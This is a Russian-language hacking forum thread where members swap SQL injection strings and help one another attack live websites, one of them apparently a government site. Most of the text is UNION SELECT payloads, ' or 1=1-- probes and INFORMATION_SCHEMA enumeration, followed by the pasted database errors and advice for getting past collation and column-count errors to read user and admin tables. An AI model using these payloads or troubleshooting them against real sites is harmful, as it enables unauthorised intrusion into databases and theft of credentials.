сабж.
постить токо по теме нужен пример запроса к базе...

test.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9/*

Query failed: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

http://zaco.cup.su/?file=view&news_id=15

юзай моск, поиск и convert()

только тут придется использовать convert(user() using latin1) cp1251 просто чаще встречается

ZaCo стукни пожалуста 170501.
Раньше занимался исключительно mysql к mssql привыкаю еще не все знаю.
Хотелось бы поговорить...

вот еще

index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20 user%20FROM%20AdminUser--

Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

index.cfm?topicID=17%20UNION%20SELECT%20TOP%201%20 random%20FROM%20AdminUser--

Error Executing Database Query.
[Macromedia][SQLServer JDBC Driver][SQLServer]Invalid column name 'random'.

Собственно еще вопрос елси верно нет вывода данных?

Invalid column name

попробуй

INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=

2limpompo
ты не посмотрел это прмер все таблицы и поля известны перечитай вопрос почему не выводит если все правильно?

Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий.

_http://site.gov/index.asp?cat=6" or 1=1--
_http://site.gov/index.asp?cat=6' or 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1--'.

/browsebycategory.asp, line 15


Исполняетьбся ез ошибок Принимает значение "6".
_http://site.gov/index.asp?cat=6 or 1=1--

Такой запрос не сьедает. Ругаеться на кол - во строк.
_http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/browsebycategory.asp, line 65


Попытка прервать запрос не удаеться.
как с одинарной так и с 2 кавычкой.
_http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--'.

/browsebycategory.asp, line 15


Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите.

Особенно интересует эта ошибка как ее обойти.
Понятно что количество строк не совпадает...

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/browsebycategory.asp, line 65